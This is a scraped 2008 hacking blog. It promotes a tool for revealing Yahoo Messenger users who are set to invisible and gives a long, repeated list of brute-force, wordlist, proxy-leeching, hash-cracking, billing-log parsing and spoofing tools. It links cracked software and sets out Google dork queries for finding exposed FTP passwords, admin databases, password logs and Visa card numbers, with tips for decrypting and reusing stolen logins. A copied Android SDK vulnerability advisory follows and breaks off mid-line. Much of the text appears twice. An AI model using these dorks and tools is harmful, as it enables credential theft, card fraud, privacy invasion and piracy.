Buddy Spy
This software is 2 awesome..
Buddy Spy is the premier program for Yahoo! Messenger status checking. With Buddy Spy you can now bypass Yahoo! Messenger's Invisible Settings with ease. With its quick and intuitive interface Buddy Spy offers you the ability to see if your friend is truly online or if they are invisible. Not only does Buddy Spy offer you online checking, but it will also tell you whether your friend is in a Chat Room or even if their Web Cam is online!
"Buddy Spy is a User friendly , straight forward program , that I would have a hard time surviving without !! It helps Me stay in touch with Those that have to log in under invisible mode to keep from being bombarded with messages from Their Friends on Their list .
What's new?
New in Buddy Spy 2.2 is a Scan History, which keeps a log of all the users you have scanned. The log includes, the user name, online status, webcam status, chat room status, date and time, in an easy to read format. Also new in this version of Buddy Spy, is the Web Check. The web check is a new scanning method that will detect online presence, even if they are not using Yahoo! Messenger.
Download it from here
http://www.buddy-spy.com/files/BuddySpySetup.exe
---------------------------------------------------------------------------
U can also chek yahoo invisible mode thru website http://www.xeeber.com
Monday, March 31, 2008
Thursday, March 20, 2008
Bruteforcing Programs
Bruteforcing Programs check dis out...
Accessdiver (AD) by Jean Fages
CODE
http://www.accessdiver.com
Sentry by Sentinel:
CODE
http://sentinel.deny.de/sentry.php
Goldeneye by Madmax
CODE
http://madmax.securibox.net/products/goldeneye/goldeneye.htm
Form@ (specifically for FORM sites) by SSS -
CODE
http://sss.deny.de/
httpbugger By Ken78x (specifically for form sites and httpS form sites)
CODE
http://ken78x.securibox.net/
Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
CODE
http://sentinel.deny.de/Caecus.php
Ares by Gamoaa -
CODE
[content suppressed]
Brutus
CODE
http://www.hoobie.net/brutus/
AuthForce by Zachary P. Landau
CODE
http://kapheine.hypa.net/authforce/index.html
Entry by Sparkleware
CODE
http://www.sparkleware.com/entry/index.html
Xavior By LithiumSoft
CODE
http://www.btinternet.com/%7Elithiumsoft/Products.html
Web Password Checker (WPC) .1 For UNIX by g1soft
CODE
http://www.securityfocus.com/tools/885/scoreit
Munga Bunga's http Brute Forcer by Munga Bunga
CODE
[content suppressed]
Wordlist Tools
Raptor 3 by Madmax
CODE
http://madmax.securibox.net/products/raptor/raptor.htm
Staph by Ashes
CODE
available at securibox.net under "downloads"
Words Extractor
CODE
http://www.intellitamper.com/wordsextractor/
Parsley by on_a_role_again
CODE
http://www.geocities.com/parsley_home/
Lucifer by Rhino -
CODE
http://rhino.deny.de/lucifer.php
ALS_novice by Wolfman -
CODE
http://wolfman.deny.de/tools.html
Combomania by Gamoaa:
CODE
available at securibox.net under "downloads"
Z-leecher by Beda
CODE
http://goldmaster.webpark.cz/sleech.html
S-Generator by Beda
CODE
http://goldmaster.webpark.cz/sgen.html
S-WordlistTool by Beda
CODE
http://goldmaster.webpark.cz/swordt.html
Proxy Tools
Proxyrama By Gaamoa
CODE
http://gaamoa.deny.de/
Charon by Rhino
CODE
http://www.icefortress.com/hosts/rhino/
Advanced Proxy Leecher (APL) by Sentinel
CODE
http://sentinel.deny.de/apl.htm
Geowhere by Jean Fages (NOT-Freeware) -
CODE
http://www.geowhere.net/
Proxy List Filter -
CODE
http://www.freeproxy.ru/en/programs/proxy_filter.htm
AATools by Glocksoft
CODE
http://www.glocksoft.com/aatools.htm
Proxy Checker by Hell Labs
CODE
http://www.helllabs.com.ua/labs.php?
Proxy Bag
CODE
http://www.intellitamper.com/proxybag/
S-Proxy Tool by Beda
CODE
http://goldmaster.webpark.cz/sproxy.html
Decrypting Tools
John The Ripper (JTR) -
CODE
http://www.openwall.com/john/
MDcrack (MD5 Cracker) -
CODE
http://membres.lycos.fr/mdcrack/
Passwords Pro (MD5/MD4/Pass Generator)
CODE
[content suppressed]
RainbowCrack Hash Cracker
CODE
http://www.antsight.com/zsl/rainbowcrack/
Distributed John The Ripper by Luis Parravicini
CODE
http://ktulu.com.ar/en/djohn.php
Cain and Abel by Massimiliano Montoro
CODE
http://www.oxid.it/cain.html
Salt Grinder by Wolfman
CODE
http://wolfman.deny.de/SaltGrinder.php
Log Tools
LogRip by Rhino -
CODE
http://rhino.deny.de/logrip.php
Azarius by Rhino -
CODE
http://rhino.deny.de/azarius.php
Zimapass Parser by Sentinel:
CODE
http://sentinel.deny.de/zimaparser.htm
C-Parse (ccbill.log parser) by Sentinel:
CODE
http://sentinel.deny.de/c_parse.htm
CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
CODE
http://membres.lycos.fr/ccbill/
Accessdiver/Ares Parser by Sentinel:
CODE
http://sentinel.deny.de/ad_ares_parser.htm
Spoofers
Zspoof by wolfman -
CODE
http://wolfman.deny.de/tools.html
Sploof by Jean Fages -
CODE
http://www.accessdiver.com/sploof.htm
Final Spoof
CODE
http://www.beatharness.com/finalspoof/
Spooph by nast0
CODE
http://24.106.100.133/spooph/index.html
D-Spoof And Others (Russian Site, English Prog)
CODE
http://mspoofer.pisem.net/zaza/index.htm
MVSLite By Mentor
CODE
http://mvs.freehosting.net/index.html
Mikho's Online Spoofer (web based spoofer, choose "open" when dialog appears)
CODE
http://www.mikhosoft.com/spoofs/
QuickSpoof
CODE
http://httpd.chello.nl/%7Em-koster2/spoofs.htm
Other Tools
Scholar by Sentinel - (History checker)
CODE
http://sentinel.deny.de/scholar.htm
Crackmate Gold by Xtremet (adultcheck gold pass verifier)
CODE
http://xtremet.deny.de/products.htm
Accessdiver (AD) by Jean Fages
CODE
http://www.accessdiver.com
Sentry by Sentinel:
CODE
http://sentinel.deny.de/sentry.php
Goldeneye by Madmax
CODE
http://madmax.securibox.net/products/goldeneye/goldeneye.htm
Form@ (specifically for FORM sites) by SSS -
CODE
http://sss.deny.de/
httpbugger By Ken78x (specifically for form sites and httpS form sites)
CODE
http://ken78x.securibox.net/
Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
CODE
http://sentinel.deny.de/Caecus.php
Ares by Gamoaa -
CODE
[content suppressed]
Brutus
CODE
http://www.hoobie.net/brutus/
AuthForce by Zachary P. Landau
CODE
http://kapheine.hypa.net/authforce/index.html
Entry by Sparkleware
CODE
http://www.sparkleware.com/entry/index.html
Xavior By LithiumSoft
CODE
http://www.btinternet.com/%7Elithiumsoft/Products.html
Web Password Checker (WPC) .1 For UNIX by g1soft
CODE
http://www.securityfocus.com/tools/885/scoreit
Munga Bunga's http Brute Forcer by Munga Bunga
CODE
[content suppressed]
Wordlist Tools
Raptor 3 by Madmax
CODE
http://madmax.securibox.net/products/raptor/raptor.htm
Staph by Ashes
CODE
available at securibox.net under "downloads"
Words Extractor
CODE
http://www.intellitamper.com/wordsextractor/
Parsley by on_a_role_again
CODE
http://www.geocities.com/parsley_home/
Lucifer by Rhino -
CODE
http://rhino.deny.de/lucifer.php
ALS_novice by Wolfman -
CODE
http://wolfman.deny.de/tools.html
Combomania by Gamoaa:
CODE
available at securibox.net under "downloads"
Z-leecher by Beda
CODE
http://goldmaster.webpark.cz/sleech.html
S-Generator by Beda
CODE
http://goldmaster.webpark.cz/sgen.html
S-WordlistTool by Beda
CODE
http://goldmaster.webpark.cz/swordt.html
Proxy Tools
Proxyrama By Gaamoa
CODE
http://gaamoa.deny.de/
Charon by Rhino
CODE
http://www.icefortress.com/hosts/rhino/
Advanced Proxy Leecher (APL) by Sentinel
CODE
http://sentinel.deny.de/apl.htm
Geowhere by Jean Fages (NOT-Freeware) -
CODE
http://www.geowhere.net/
Proxy List Filter -
CODE
http://www.freeproxy.ru/en/programs/proxy_filter.htm
AATools by Glocksoft
CODE
http://www.glocksoft.com/aatools.htm
Proxy Checker by Hell Labs
CODE
http://www.helllabs.com.ua/labs.php?
Proxy Bag
CODE
http://www.intellitamper.com/proxybag/
S-Proxy Tool by Beda
CODE
http://goldmaster.webpark.cz/sproxy.html
Decrypting Tools
John The Ripper (JTR) -
CODE
http://www.openwall.com/john/
MDcrack (MD5 Cracker) -
CODE
http://membres.lycos.fr/mdcrack/
Passwords Pro (MD5/MD4/Pass Generator)
CODE
[content suppressed]
RainbowCrack Hash Cracker
CODE
http://www.antsight.com/zsl/rainbowcrack/
Distributed John The Ripper by Luis Parravicini
CODE
http://ktulu.com.ar/en/djohn.php
Cain and Abel by Massimiliano Montoro
CODE
http://www.oxid.it/cain.html
Salt Grinder by Wolfman
CODE
http://wolfman.deny.de/SaltGrinder.php
Log Tools
LogRip by Rhino -
CODE
http://rhino.deny.de/logrip.php
Azarius by Rhino -
CODE
http://rhino.deny.de/azarius.php
Zimapass Parser by Sentinel:
CODE
http://sentinel.deny.de/zimaparser.htm
C-Parse (ccbill.log parser) by Sentinel:
CODE
http://sentinel.deny.de/c_parse.htm
CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
CODE
http://membres.lycos.fr/ccbill/
Accessdiver/Ares Parser by Sentinel:
CODE
http://sentinel.deny.de/ad_ares_parser.htm
Spoofers
Zspoof by wolfman -
CODE
http://wolfman.deny.de/tools.html
Sploof by Jean Fages -
CODE
http://www.accessdiver.com/sploof.htm
Final Spoof
CODE
http://www.beatharness.com/finalspoof/
Spooph by nast0
CODE
http://24.106.100.133/spooph/index.html
D-Spoof And Others (Russian Site, English Prog)
CODE
http://mspoofer.pisem.net/zaza/index.htm
MVSLite By Mentor
CODE
http://mvs.freehosting.net/index.html
Mikho's Online Spoofer (web based spoofer, choose "open" when dialog appears)
CODE
http://www.mikhosoft.com/spoofs/
QuickSpoof
CODE
http://httpd.chello.nl/%7Em-koster2/spoofs.htm
Other Tools
Scholar by Sentinel - (History checker)
CODE
http://sentinel.deny.de/scholar.htm
Crackmate Gold by Xtremet (adultcheck gold pass verifier)
CODE
http://xtremet.deny.de/products.htm
Thursday, March 13, 2008
WinRAR Password Recovery
Here is the tool to recover/hack passwords of an winrar file..so go 4 it..!!
Download link:
http://rapidshare.com/files/24876686/rar_password_recovery_with_crack.rar
Password: www.downloadwarez.org
Download link:
http://rapidshare.com/files/24876686/rar_password_recovery_with_crack.rar
Password: www.downloadwarez.org
Boost Internet Surfing Speed-Working!!
I've experienced the big boost in my surfing & downloading speed by the following combination.
Firefox + IDM + TCP Optimizer
Plz do a speed test of your net connection before & after at hCEp://speedtest.net/ to know what difference this software has made.
1) Every1 knows that how to Speed Up the Firefox.
Who dont know, just do the following.
* Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
* Alter the entries do as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30.
* Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
2) Now Download & Install IDM. ( The Best Download Manager I've ever used. )
hCEp://rapidshare.com/files/99013377/Internet_Download_Manager_5.12_Prateek_s_The_Hacker.rar
3) Now Download TCP Optimizer
:: Download ::
hCEp://wCw.download.com/SG-TCP-Optimizer/3000-2155_4-10415840.html
When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
In the next box, press OK and reboot.
& Plzzz its my request to every1 that plz reply to this topic only after u try this.
Before speed: 210 KBPS
After speed: 280 KBPS
Firefox + IDM + TCP Optimizer
Plz do a speed test of your net connection before & after at hCEp://speedtest.net/ to know what difference this software has made.
1) Every1 knows that how to Speed Up the Firefox.
Who dont know, just do the following.
* Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipelining
network.http.proxy.pipelining
network.http.pipelining.maxrequests
* Alter the entries do as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30.
* Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to "0".
2) Now Download & Install IDM. ( The Best Download Manager I've ever used. )
hCEp://rapidshare.com/files/99013377/Internet_Download_Manager_5.12_Prateek_s_The_Hacker.rar
3) Now Download TCP Optimizer
:: Download ::
hCEp://wCw.download.com/SG-TCP-Optimizer/3000-2155_4-10415840.html
When u open TCP Optimizer, dont do anything, just select the option 'Optimal Settings' & apply the changes.
In the next box, press OK and reboot.
& Plzzz its my request to every1 that plz reply to this topic only after u try this.
Before speed: 210 KBPS
After speed: 280 KBPS
Tuesday, March 11, 2008
Google Advanced Search Options....Njoy!!
ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!
That's some good stuff. Just copy/paste the text into your own WS FTP ini file and you're good as gold (assuming you're using the same version). Don't forget - even if they have taken the file offline, use the "cache:FULL_URL/wsftp.ini" to see the contents.
probably one of the best exploits I have seen in a long time, when I did it there were about 20 vulnerable computers, just recently there was 4 so I hope whitehats got to this before anyone else. really nice !!
To see results; just write in the (http://www.google.com/) search engine the code:
intitle:index.of ws_ftp.ini
Frontpage.. very nice clean search results listing !! I magine with me that you can steal or know the password of any web site designed by "Frontpage". But the file containing the password might be encrypted; to decrypt the file download the program " john the ripper".
To see results; just write in the (http://www.google.com/) search engine the code:
"# -FrontPage-" inurl:service.pwd
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics.
To see results; just write in the (http://www.google.com/) search engine the code:
"AutoCreate=TRUE password=*"
WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! And much adminstrated passwords and user passwords, a lot of emails and the such too…
To see results; just write in the (http://www.google.com/) search engine the code:
allinurl: admin mdb
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun.
To see results; just write in the (http://www.google.com/) search engine the code:
allinurl:auth_user_file.txt
These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:cfm "cfapplication name" password
The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the "index of" keyword or by searching directly for the PWD= value inside the configuration file.
There is an easy way to decrypt the hash, use the decryptor at:
http://www.codebluehacks.com/Tools.php?ID=1
Or
http://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:ini ws_ftp pwd
These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:log inurl:"password.log"
Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).
To see results; just write in the (http://www.google.com/) search engine the code:
"adding new user" inurl:addnewuser -"there are no domains"
Google is so smart, it’s scary sometimes. I has found another interesting (to say the least) Google use.
I just ran across a pretty scary new google trick. It seems they have just recently added number span searching to their engine. Take a look at this example:
To see results; just write in the (http://www.google.com/) search engine the code:
visa 4356000000000000..4356999999999999
Basically, what this search does is search for the word “visa” [credit card] with any numbers that fit within your query. i.e. any Visa credit card number with the first four digits 4356.
As you can see, Google has searched the entire range against its DB. Within minutes I found some crazy sites like this one. Now please know that Google didn’t create this tool to be used like this. It’s actually quite handy when used correctly. Just an FYI for all of you.
Let's pretend you need a serial number for windows xp pro. The key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
To see results; just write in the (http://www.google.com/) search engine the code:
"Windows XP Professional" 94FBR
By the way, don't forget to change "Window sXP Professional" to any product you need its serial number.
That's some good stuff. Just copy/paste the text into your own WS FTP ini file and you're good as gold (assuming you're using the same version). Don't forget - even if they have taken the file offline, use the "cache:FULL_URL/wsftp.ini" to see the contents.
probably one of the best exploits I have seen in a long time, when I did it there were about 20 vulnerable computers, just recently there was 4 so I hope whitehats got to this before anyone else. really nice !!
To see results; just write in the (http://www.google.com/) search engine the code:
intitle:index.of ws_ftp.ini
Frontpage.. very nice clean search results listing !! I magine with me that you can steal or know the password of any web site designed by "Frontpage". But the file containing the password might be encrypted; to decrypt the file download the program " john the ripper".
To see results; just write in the (http://www.google.com/) search engine the code:
"# -FrontPage-" inurl:service.pwd
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics.
To see results; just write in the (http://www.google.com/) search engine the code:
"AutoCreate=TRUE password=*"
WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:ini ws_ftp pwd
Or
"index of/" "ws_ftp.ini" "parent directory"
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are! And much adminstrated passwords and user passwords, a lot of emails and the such too…
To see results; just write in the (http://www.google.com/) search engine the code:
allinurl: admin mdb
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun.
To see results; just write in the (http://www.google.com/) search engine the code:
allinurl:auth_user_file.txt
These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:cfm "cfapplication name" password
The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the "index of" keyword or by searching directly for the PWD= value inside the configuration file.
There is an easy way to decrypt the hash, use the decryptor at:
http://www.codebluehacks.com/Tools.php?ID=1
Or
http://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:ini ws_ftp pwd
These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user.
To see results; just write in the (http://www.google.com/) search engine the code:
filetype:log inurl:"password.log"
Allows an attacker to create an account on a server running Argosoft mail server pro for windows with unlimited disk quota (but a 5mb per message limit should you use your account to send mail).
To see results; just write in the (http://www.google.com/) search engine the code:
"adding new user" inurl:addnewuser -"there are no domains"
Google is so smart, it’s scary sometimes. I has found another interesting (to say the least) Google use.
I just ran across a pretty scary new google trick. It seems they have just recently added number span searching to their engine. Take a look at this example:
To see results; just write in the (http://www.google.com/) search engine the code:
visa 4356000000000000..4356999999999999
Basically, what this search does is search for the word “visa” [credit card] with any numbers that fit within your query. i.e. any Visa credit card number with the first four digits 4356.
As you can see, Google has searched the entire range against its DB. Within minutes I found some crazy sites like this one. Now please know that Google didn’t create this tool to be used like this. It’s actually quite handy when used correctly. Just an FYI for all of you.
Let's pretend you need a serial number for windows xp pro. The key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
To see results; just write in the (http://www.google.com/) search engine the code:
"Windows XP Professional" 94FBR
By the way, don't forget to change "Window sXP Professional" to any product you need its serial number.
Monday, March 10, 2008
Vulnerablities in GOOGLE ANDROID SDK
Multiple vulnerabilities in Google's Android SDK
Mar 04 2008 06:26PM
Core Security Technologies Advisories (advisories coresecurity com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007.
The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality.
Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.
*Vulnerable Packages*
. Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory).
. Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).
Core Security Technologies Advisories (advisories coresecurity com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs
Multiple vulnerabilities in Google's Android SDK
*Advisory Information*
Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=ite
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release
*Vulnerability Information*
Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269
*Vulnerability Description*
Android is project promoted primarily by Google through the Open Handset
Alliance aimed at providing a complete set of software for mobile
devices: an operating system, middleware and key mobile applications
[1]. Although the project is currently in a development phase and has
not made an official release yet, several vendors of mobile chips have
unveiled prototype phones built using development releases of the
platform at the Mobile World Congress [2]. Development using the Android
platform gained activity early in 2008 as a result of Google's launch of
the Android Development Challenge which includes $10 million USD in
awards [3] for which a Software Development Kit (SDK) was made available
in November 2007.
The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].
Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF an BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries other
were introduced by native Android code that use them or that implements
new functionality.
Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates phone running the Android
platform on an ARM microprocessor.
This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.
*Vulnerable Packages*
. Android SDK m3-rc37a and earlier are vulnerable several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory).
. Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).
*Non-vulnerable Packages*
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.
The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.
Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cp
p'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
return GIF_ERROR;
...
}
- -----------/
We can see that the fields are stored in the first 2 words of the
structure:
/-----------
typedef struct GifFileType {
/* Screen dimensions. */
GifWord SWidth, SHeight,
...
}
- -----------/
In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:
/-----------
.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5
- -----------/
. Android SDK m5-rc15
*Vendor Information, Solutions and Workarounds*
Vendor statement:
"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."
*Credits*
These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.
*Technical Description / Proof of Concept Code*
Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.
The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.
Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-start exploitation techniques for different hardware
platforms and operating systems [6].
The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.
#1 - GIF image parsing heap overflow
The Graphics Interchange Format (GIF) is image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.
A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
filed of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the
open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image
p'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].
Detailed analysis:
When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.
Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
/* Put the screen descriptor into the file: */
if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
